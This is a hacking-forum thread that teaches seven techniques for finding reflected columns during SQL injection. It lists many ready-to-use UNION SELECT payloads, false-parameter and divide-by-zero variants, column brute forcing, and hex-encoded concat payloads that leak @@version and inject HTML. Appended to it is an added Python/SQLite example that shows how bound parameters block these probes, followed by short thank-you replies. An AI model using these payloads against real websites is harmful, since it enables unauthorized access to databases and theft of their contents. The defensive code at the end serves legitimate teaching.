MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: Find Vulnerable Column New
How to find Vulnerable Columns?
1st Technique:-
use -> id = -1 union select 1,2,3,4,5--
use -> id = 1111/9999/null/bybysql union select 1,2,3,4,5--
use -> id = .1/1.2/12.4 union select 1,2,3,4,5--   [Thanks to Crown sir]

Note:- I use null and bybysql. Don't get confused by them; you can use whatever you like, meaning use things which don't exist [Thanks to Hack Forum]

2nd Technique :- False Parameter
Here False Parameter means putting something that makes a wrong response into our SQL PARAMETER, like
(a) 1=2, 1=0
use -> id=1 or 1=2 union select 1,2,3,4,5--
use -> id=1 or 1=0 union select 1,2,3,4,5--

(b) We can also use having, like, <>
use -> id=1 having/HAVING 1=2 union select 1,2,3,4,5--
use -> id=1  1  like/LIKE 2 union select 1,2,3,4,5--
use -> id=1   1 <> 1 union select 1,2,3,4,5--
use -> id=1 {having/and} 1 like 2  union select 1,2,3,4,5--
use -> id=1 {having/and} 1 <> 1 union select 1,2,3,4,5--     /* use either  having or and

(c) You can also use an and false/AND FALSE statement
use ->  id=1  and false union select 1,2,3,4,5--

3rd Technique :-  Divide by 0  means  -> /0    and  +div+0    
use -> id =12/0 union select 1,2,3,4,5--

use -> id = 12+div+0+ union select 1,2,3,4,5--

4th Technique :- Look closely, or scratch the HTML source code

The number can potentially be displayed anywhere; when it's kind of rough, just change the query to make the whole thing more visible, to something like union select 1111,2222,3333,4444,5555--

Above we use 1111, 2222 instead of 1, 2 respectively

After writing that code, open the source code, then search for the 'Column Number' like 1111,2222,3333,4444,5555 by using CTRL+F (for finding something in source code). Then check where that number appears in the source code.

Sometimes the number displays in the page title.

When you get the vulnerable columns, you then want to display the version, user, database or some HTML parts visibly on the page. So for that, follow these steps :-
i.) id = -1 union select 1111,2222,concat(0x223e,@@version,0x3c696d67207372633d22),4444--
223e =>    ">
3c696d67207372633d22   =>       <img src="  
*Remember we use 0x so that the above hex code works

ii.) To print our name
id = -1 union select 1111,2222,concat(0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d),4444--
0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d =>   \"><font color = red size=4>AAKASH</font><!--

5th Technique :-
If you tried all the above techniques but still can't get a vulnerable column, then you can also use this 5th technique.... What's new in this technique? See :-

You can use union select 1,2,3,4,5--   as  union (select 1,2,3,4,5)--
use :- id=-2 union (select 1,2,3,4,5)--
/*  If you see a vulnerable column like 3 then
use :- id=-2 union (select 1,2,333(4 check)/@@version,4,5)--   

6th Technique :- True Parameter

use -> id=1 +where+1=1  union select 1,2,3,4,5--
use -> id=1 +and+50=50  union select 1,2,3,4,5--
use -> id=1 =75=75  union select 1,2,3,4,5--

7th Technique :- Bruteforcing the column /* Thanks to My Master Devilhunter Dante
Friends, when you can't find the number of columns, you can also use this technique. With this technique you not only find the number of columns, you also get the vulnerable columns.
Follow the following steps
1st do  ->  union select 1--
2nd do -> union select 1,2--
3rd do -> union select 1,2,3--
4th do -> union select 1,2,3,4--
5th do -> union select 1,2,3,4,5--

Do the above steps until you can't get vulnerable columns

Thanks and credit goes to
2. MakMan
3. Benzi
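
Why the marker numbers from the post above reach the page, and why a bound parameter stops every variant of it: an added example, not part of the original thread. It uses SQLite in place of the MySQL setup the post assumes; the table, the template and all function names are hypothetical.

```python
import sqlite3

MARKERS = {"1111": 1, "2222": 2, "3333": 3, "4444": 4, "5555": 5}

def make_db():
    # Constructed sample data: a 5-column table like the query the post assumes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT,"
               " author TEXT, views INTEGER)")
    db.execute("INSERT INTO news VALUES (1, 'Hello', 'First post', 'admin', 10)")
    return db

def render(rows):
    # Hypothetical template: only columns 2 and 3 (title, body) reach the HTML.
    return "".join(f"<title>{r[1]}</title><p>{r[2]}</p>" for r in rows)

def page_vulnerable(db, raw_id):
    # BEFORE: the request parameter is concatenated into the SQL text.
    sql = "SELECT id, title, body, author, views FROM news WHERE id = " + raw_id
    return render(db.execute(sql).fetchall())

def page_hardened(db, raw_id):
    # AFTER: reject non-integers, then bind the value as data, never as syntax.
    try:
        news_id = int(raw_id)
    except ValueError:
        return ""  # a real handler would answer HTTP 400 here
    sql = "SELECT id, title, body, author, views FROM news WHERE id = ?"
    return render(db.execute(sql, (news_id,)).fetchall())

def reflected_columns(html):
    # Which marker values (and so which column positions) reached the page.
    return sorted(col for marker, col in MARKERS.items() if marker in html)

# Constructed inputs in the style of the 1st and 2nd techniques in the post.
PROBES = [
    "-1 union select 1111,2222,3333,4444,5555--",
    "1 and 1=2 union select 1111,2222,3333,4444,5555--",
]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe))
        print("  concatenated:", reflected_columns(page_vulnerable(db, probe)))
        print("  bound:       ", reflected_columns(page_hardened(db, probe)))
```

With the concatenated query the first SELECT matches no row, so the only row the template renders is the injected one and columns 2 and 3 show up in the HTML; with the bound parameter the same input never becomes SQL and nothing is reflected.
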
Old Methods  90 ....
Old Method Any Good :angel:
nice and keep sharing bro
Good share..
old but gold
Thanks for sharing bro :p
Thanks for sharing.
OLD is Always GOLD